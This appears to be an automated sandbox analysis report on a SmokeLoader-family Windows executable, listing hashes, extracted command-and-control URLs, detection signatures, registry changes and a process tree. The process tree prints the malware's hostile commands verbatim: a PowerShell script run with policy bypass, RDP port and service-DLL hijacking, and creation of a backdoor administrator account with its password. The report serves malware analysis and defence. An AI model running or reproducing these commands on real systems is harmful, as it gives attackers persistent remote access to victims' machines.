Analysis
-
max time kernel
162s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
28-10-2021 16:38
Static task
static1
Behavioral task
behavioral1
Sample
e5bda93ec7d8724ce496359c5e3efabe.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
e5bda93ec7d8724ce496359c5e3efabe.exe
Resource
win10-en-20211014
General
-
Target
e5bda93ec7d8724ce496359c5e3efabe.exe
-
Size
185KB
-
MD5
e5bda93ec7d8724ce496359c5e3efabe
-
SHA1
ad9e1db817d0c69760155939c2fd633031f10418
-
SHA256
0610000cdfda33355202ed75a2f542cf035207e5d26d5e4b11063a17cdcdc8be
-
SHA512
53a1e16ab40c0173248b9adf8bb4ecf04fef532301581c63b3876803c8234185fedf4dd588d768e29b610dd5ecc62f933dd79427f086c89741768e5c8cfe9948
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 56 692 powershell.exe 59 692 powershell.exe 60 692 powershell.exe 61 692 powershell.exe 63 692 powershell.exe 65 692 powershell.exe 67 692 powershell.exe 69 692 powershell.exe 72 692 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
8FD8.exepid process 4580 8FD8.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 3056 -
Loads dropped DLL 2 IoCs
Processes:
pid process 1500 1500 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFCDD.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFC6E.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFC8E.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_21fl14we.uok.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFC00.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFCEE.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_fn55zvfi.xq3.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
e5bda93ec7d8724ce496359c5e3efabe.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e5bda93ec7d8724ce496359c5e3efabe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e5bda93ec7d8724ce496359c5e3efabe.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e5bda93ec7d8724ce496359c5e3efabe.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 59 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 60 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 61 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
e5bda93ec7d8724ce496359c5e3efabe.exepid process 3220 e5bda93ec7d8724ce496359c5e3efabe.exe 3220 e5bda93ec7d8724ce496359c5e3efabe.exe 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3056 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 644 644 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
e5bda93ec7d8724ce496359c5e3efabe.exepid process 3220 e5bda93ec7d8724ce496359c5e3efabe.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1240 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeIncreaseQuotaPrivilege 1688 powershell.exe Token: SeSecurityPrivilege 1688 powershell.exe Token: SeTakeOwnershipPrivilege 1688 powershell.exe Token: SeLoadDriverPrivilege 1688 powershell.exe Token: SeSystemProfilePrivilege 1688 powershell.exe Token: SeSystemtimePrivilege 1688 powershell.exe Token: SeProfSingleProcessPrivilege 1688 powershell.exe Token: SeIncBasePriorityPrivilege 1688 powershell.exe Token: SeCreatePagefilePrivilege 1688 powershell.exe Token: SeBackupPrivilege 1688 powershell.exe Token: SeRestorePrivilege 1688 powershell.exe Token: SeShutdownPrivilege 1688 powershell.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeSystemEnvironmentPrivilege 1688 powershell.exe Token: SeRemoteShutdownPrivilege 1688 powershell.exe Token: SeUndockPrivilege 1688 powershell.exe Token: SeManageVolumePrivilege 1688 powershell.exe Token: 33 1688 powershell.exe Token: 34 1688 powershell.exe Token: 35 1688 powershell.exe Token: 36 1688 powershell.exe Token: SeDebugPrivilege 5064 powershell.exe Token: SeIncreaseQuotaPrivilege 5064 powershell.exe Token: SeSecurityPrivilege 5064 powershell.exe Token: SeTakeOwnershipPrivilege 5064 powershell.exe Token: SeLoadDriverPrivilege 5064 powershell.exe Token: SeSystemProfilePrivilege 5064 powershell.exe Token: SeSystemtimePrivilege 5064 powershell.exe Token: SeProfSingleProcessPrivilege 5064 powershell.exe Token: SeIncBasePriorityPrivilege 5064 powershell.exe Token: SeCreatePagefilePrivilege 5064 powershell.exe Token: SeBackupPrivilege 5064 powershell.exe Token: SeRestorePrivilege 5064 powershell.exe Token: SeShutdownPrivilege 5064 powershell.exe Token: SeDebugPrivilege 5064 powershell.exe Token: SeSystemEnvironmentPrivilege 5064 powershell.exe Token: SeRemoteShutdownPrivilege 5064 powershell.exe Token: SeUndockPrivilege 5064 powershell.exe Token: SeManageVolumePrivilege 5064 powershell.exe Token: 33 5064 powershell.exe Token: 34 5064 powershell.exe Token: 35 5064 powershell.exe Token: 36 5064 powershell.exe Token: SeDebugPrivilege 844 powershell.exe Token: SeIncreaseQuotaPrivilege 844 powershell.exe Token: SeSecurityPrivilege 844 powershell.exe Token: SeTakeOwnershipPrivilege 844 powershell.exe Token: SeLoadDriverPrivilege 844 powershell.exe Token: SeSystemProfilePrivilege 844 powershell.exe Token: SeSystemtimePrivilege 844 powershell.exe Token: SeProfSingleProcessPrivilege 844 powershell.exe Token: SeIncBasePriorityPrivilege 844 powershell.exe Token: SeCreatePagefilePrivilege 844 powershell.exe Token: SeBackupPrivilege 844 powershell.exe Token: SeRestorePrivilege 844 powershell.exe Token: SeShutdownPrivilege 844 powershell.exe Token: SeDebugPrivilege 844 powershell.exe Token: SeSystemEnvironmentPrivilege 844 powershell.exe Token: SeRemoteShutdownPrivilege 844 powershell.exe Token: SeUndockPrivilege 844 powershell.exe Token: SeManageVolumePrivilege 844 powershell.exe Token: 33 844 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid process 3056 3056 3056 3056 -
Suspicious use of SendNotifyMessage 5 IoCs
Processes:
pid process 3056 3056 3056 3056 3056 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8FD8.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 3056 wrote to memory of 4580 3056 8FD8.exe PID 3056 wrote to memory of 4580 3056 8FD8.exe PID 4580 wrote to memory of 1240 4580 8FD8.exe powershell.exe PID 4580 wrote to memory of 1240 4580 8FD8.exe powershell.exe PID 1240 wrote to memory of 2368 1240 powershell.exe csc.exe PID 1240 wrote to memory of 2368 1240 powershell.exe csc.exe PID 2368 wrote to memory of 2500 2368 csc.exe cvtres.exe PID 2368 wrote to memory of 2500 2368 csc.exe cvtres.exe PID 1240 wrote to memory of 1688 1240 powershell.exe powershell.exe PID 1240 wrote to memory of 1688 1240 powershell.exe powershell.exe PID 1240 wrote to memory of 5064 1240 powershell.exe powershell.exe PID 1240 wrote to memory of 5064 1240 powershell.exe powershell.exe PID 1240 wrote to memory of 844 1240 powershell.exe powershell.exe PID 1240 wrote to memory of 844 1240 powershell.exe powershell.exe PID 1240 wrote to memory of 3012 1240 powershell.exe reg.exe PID 1240 wrote to memory of 3012 1240 powershell.exe reg.exe PID 1240 wrote to memory of 2420 1240 powershell.exe reg.exe PID 1240 wrote to memory of 2420 1240 powershell.exe reg.exe PID 1240 wrote to memory of 3212 1240 powershell.exe reg.exe PID 1240 wrote to memory of 3212 1240 powershell.exe reg.exe PID 1240 wrote to memory of 4524 1240 powershell.exe net.exe PID 1240 wrote to memory of 4524 1240 powershell.exe net.exe PID 4524 wrote to memory of 3232 4524 net.exe net1.exe PID 4524 wrote to memory of 3232 4524 net.exe net1.exe PID 1240 wrote to memory of 4624 1240 powershell.exe cmd.exe PID 1240 wrote to memory of 4624 1240 powershell.exe cmd.exe PID 4624 wrote to memory of 3944 4624 cmd.exe cmd.exe PID 4624 wrote to memory of 3944 4624 cmd.exe cmd.exe PID 3944 wrote to memory of 4676 3944 cmd.exe net.exe PID 3944 wrote to memory of 4676 3944 cmd.exe net.exe PID 4676 wrote to memory of 4656 4676 net.exe net1.exe PID 4676 wrote to memory of 4656 4676 net.exe net1.exe PID 1240 wrote to memory of 4568 1240 powershell.exe cmd.exe PID 1240 wrote to memory of 4568 1240 powershell.exe cmd.exe PID 4568 wrote to memory of 4564 4568 cmd.exe cmd.exe PID 4568 wrote to memory of 4564 4568 cmd.exe cmd.exe PID 4564 wrote to memory of 1128 4564 cmd.exe net.exe PID 4564 wrote to memory of 1128 4564 cmd.exe net.exe PID 1128 wrote to memory of 1276 1128 net.exe net1.exe PID 1128 wrote to memory of 1276 1128 net.exe net1.exe PID 2220 wrote to memory of 2000 2220 cmd.exe net.exe PID 2220 wrote to memory of 2000 2220 cmd.exe net.exe PID 2000 wrote to memory of 2768 2000 net.exe net1.exe PID 2000 wrote to memory of 2768 2000 net.exe net1.exe PID 2440 wrote to memory of 4512 2440 cmd.exe net.exe PID 2440 wrote to memory of 4512 2440 cmd.exe net.exe PID 4512 wrote to memory of 2780 4512 net.exe net1.exe PID 4512 wrote to memory of 2780 4512 net.exe net1.exe PID 3672 wrote to memory of 1800 3672 cmd.exe net.exe PID 3672 wrote to memory of 1800 3672 cmd.exe net.exe PID 1800 wrote to memory of 4256 1800 net.exe net1.exe PID 1800 wrote to memory of 4256 1800 net.exe net1.exe PID 5004 wrote to memory of 1148 5004 cmd.exe net.exe PID 5004 wrote to memory of 1148 5004 cmd.exe net.exe PID 1148 wrote to memory of 2012 1148 net.exe net1.exe PID 1148 wrote to memory of 2012 1148 net.exe net1.exe PID 2976 wrote to memory of 5052 2976 cmd.exe net.exe PID 2976 wrote to memory of 5052 2976 cmd.exe net.exe PID 5052 wrote to memory of 4932 5052 net.exe net1.exe PID 5052 wrote to memory of 4932 5052 net.exe net1.exe PID 4236 wrote to memory of 5020 4236 cmd.exe net.exe PID 4236 wrote to memory of 5020 4236 cmd.exe net.exe PID 5020 wrote to memory of 5032 5020 net.exe net1.exe PID 5020 wrote to memory of 5032 5020 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e5bda93ec7d8724ce496359c5e3efabe.exe"C:\Users\Admin\AppData\Local\Temp\e5bda93ec7d8724ce496359c5e3efabe.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\8FD8.exeC:\Users\Admin\AppData\Local\Temp\8FD8.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ok2j0wes\ok2j0wes.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA84.tmp" "c:\Users\Admin\AppData\Local\Temp\ok2j0wes\CSC1F554B787EB747A1B8AA18148AA57AB.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc lbwp0NfX /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc lbwp0NfX /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc lbwp0NfX /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
